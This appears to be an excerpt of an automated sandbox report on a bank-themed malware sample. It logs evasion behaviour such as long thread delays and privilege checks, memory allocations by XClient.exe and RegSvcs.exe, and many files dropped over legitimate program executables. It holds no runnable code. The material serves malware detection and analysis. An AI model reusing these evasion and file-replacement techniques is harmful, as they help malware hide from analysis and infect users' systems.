Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 13_2_00CD52A0
Source: C:\Users\user\AppData\Local\differences\niellist.exe API/Special instruction interceptor: Address: CEA034
Source: C:\Users\user\AppData\Local\differences\niellist.exe API/Special instruction interceptor: Address: AFC28C
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 17B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 3210000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 5210000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Memory allocated: 1330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Memory allocated: 1AEB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 8B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1A610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1B110000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5865
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3893
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe API coverage: 5.8 %
Source: C:\Windows\System32\alg.exe TID: 1624 Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 2348 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7192 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7284 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7792 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep count: 6573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep count: 3193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1084 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 5784 Thread sleep count: 56 > 30
Source: C:\Windows\System32\alg.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\build.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
